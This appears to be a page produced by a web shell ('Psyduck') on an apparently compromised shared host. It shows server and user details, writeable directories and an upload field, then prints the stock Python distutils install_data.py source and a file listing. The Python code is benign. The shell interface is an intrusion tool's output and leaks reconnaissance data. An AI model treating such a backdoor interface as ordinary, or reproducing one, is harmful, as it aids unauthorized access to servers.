Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /lib64/python2.7/distutils/command/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib64/python2.7/distutils/command/install_data.py
"""distutils.command.install_data

Implements the Distutils 'install_data' command, for installing
platform-independent data files."""

# contributed by Bastian Kleineidam

__revision__ = "$Id$"

import os
from distutils.core import Command
from distutils.util import change_root, convert_path

class install_data(Command):

    description = "install data files"

    user_options = [
        ('install-dir=', 'd',
         "base directory for installing data files "
         "(default: installation base dir)"),
        ('root=', None,
         "install everything relative to this alternate root directory"),
        ('force', 'f', "force installation (overwrite existing files)"),
        ]

    boolean_options = ['force']

    def initialize_options(self):
        self.install_dir = None
        self.outfiles = []
        self.root = None
        self.force = 0
        self.data_files = self.distribution.data_files
        self.warn_dir = 1

    def finalize_options(self):
        self.set_undefined_options('install',
                                   ('install_data', 'install_dir'),
                                   ('root', 'root'),
                                   ('force', 'force'),
                                  )

    def run(self):
        self.mkpath(self.install_dir)
        for f in self.data_files:
            if isinstance(f, str):
                # it's a simple file, so copy it
                f = convert_path(f)
                if self.warn_dir:
                    self.warn("setup script did not provide a directory for "
                              "'%s' -- installing right in '%s'" %
                              (f, self.install_dir))
                (out, _) = self.copy_file(f, self.install_dir)
                self.outfiles.append(out)
            else:
                # it's a tuple with path to install to and a list of files
                dir = convert_path(f[0])
                if not os.path.isabs(dir):
                    dir = os.path.join(self.install_dir, dir)
                elif self.root:
                    dir = change_root(self.root, dir)
                self.mkpath(dir)

                if f[1] == []:
                    # If there are no files listed, the user must be
                    # trying to create an empty directory, so add the
                    # directory to the list of output files.
                    self.outfiles.append(dir)
                else:
                    # Copy files, adding them to the list of output files.
                    for data in f[1]:
                        data = convert_path(data)
                        (out, _) = self.copy_file(data, dir)
                        self.outfiles.append(out)

    def get_inputs(self):
        return self.data_files or []

    def get_outputs(self):
        return self.outfiles
Name
Size
Permissions
Options
__init__.py
0.803 KB
-rw-r--r--
__init__.pyc
0.649 KB
-rw-r--r--
__init__.pyo
0.649 KB
-rw-r--r--
bdist.py
5.465 KB
-rw-r--r--
bdist.pyc
5.048 KB
-rw-r--r--
bdist.pyo
5.048 KB
-rw-r--r--
bdist_dumb.py
5.074 KB
-rw-r--r--
bdist_dumb.pyc
4.866 KB
-rw-r--r--
bdist_dumb.pyo
4.866 KB
-rw-r--r--
bdist_msi.py
34.368 KB
-rw-r--r--
bdist_msi.pyc
23.399 KB
-rw-r--r--
bdist_msi.pyo
23.295 KB
-rw-r--r--
bdist_rpm.py
20.556 KB
-rw-r--r--
bdist_rpm.pyc
17.195 KB
-rw-r--r--
bdist_rpm.pyo
17.113 KB
-rw-r--r--
bdist_wininst.py
14.647 KB
-rw-r--r--
bdist_wininst.pyc
10.474 KB
-rw-r--r--
bdist_wininst.pyo
10.396 KB
-rw-r--r--
build.py
5.328 KB
-rw-r--r--
build.pyc
5.025 KB
-rw-r--r--
build.pyo
5.025 KB
-rw-r--r--
build_clib.py
7.94 KB
-rw-r--r--
build_clib.pyc
6.198 KB
-rw-r--r--
build_clib.pyo
6.198 KB
-rw-r--r--
build_ext.py
31.749 KB
-rw-r--r--
build_ext.py.debug-build
31.514 KB
-rw-r--r--
build_ext.pyc
18.891 KB
-rw-r--r--
build_ext.pyo
18.891 KB
-rw-r--r--
build_py.py
15.955 KB
-rw-r--r--
build_py.pyc
11.224 KB
-rw-r--r--
build_py.pyo
11.153 KB
-rw-r--r--
build_scripts.py
4.49 KB
-rw-r--r--
build_scripts.pyc
4.372 KB
-rw-r--r--
build_scripts.pyo
4.372 KB
-rw-r--r--
check.py
5.539 KB
-rw-r--r--
check.pyc
6.115 KB
-rw-r--r--
check.pyo
6.115 KB
-rw-r--r--
clean.py
2.748 KB
-rw-r--r--
clean.pyc
2.997 KB
-rw-r--r--
clean.pyo
2.997 KB
-rw-r--r--
command_template
0.702 KB
-rw-r--r--
config.py
12.822 KB
-rw-r--r--
config.pyc
12.388 KB
-rw-r--r--
config.pyo
12.388 KB
-rw-r--r--
install.py
25.648 KB
-rw-r--r--
install.pyc
16.424 KB
-rw-r--r--
install.pyo
16.424 KB
-rw-r--r--
install_data.py
2.778 KB
-rw-r--r--
install_data.pyc
3.045 KB
-rw-r--r--
install_data.pyo
3.045 KB
-rw-r--r--
install_egg_info.py
2.526 KB
-rw-r--r--
install_egg_info.pyc
3.656 KB
-rw-r--r--
install_egg_info.pyo
3.656 KB
-rw-r--r--
install_headers.py
1.314 KB
-rw-r--r--
install_headers.pyc
2.202 KB
-rw-r--r--
install_headers.pyo
2.202 KB
-rw-r--r--
install_lib.py
8.143 KB
-rw-r--r--
install_lib.pyc
6.524 KB
-rw-r--r--
install_lib.pyo
6.524 KB
-rw-r--r--
install_scripts.py
2.02 KB
-rw-r--r--
install_scripts.pyc
2.859 KB
-rw-r--r--
install_scripts.pyo
2.859 KB
-rw-r--r--
register.py
11.562 KB
-rw-r--r--
register.pyc
9.969 KB
-rw-r--r--
register.pyo
9.969 KB
-rw-r--r--
sdist.py
18.122 KB
-rw-r--r--
sdist.pyc
16.305 KB
-rw-r--r--
sdist.pyo
16.305 KB
-rw-r--r--
upload.py
6.836 KB
-rw-r--r--
upload.pyc
6.16 KB
-rw-r--r--
upload.pyo
6.16 KB
-rw-r--r--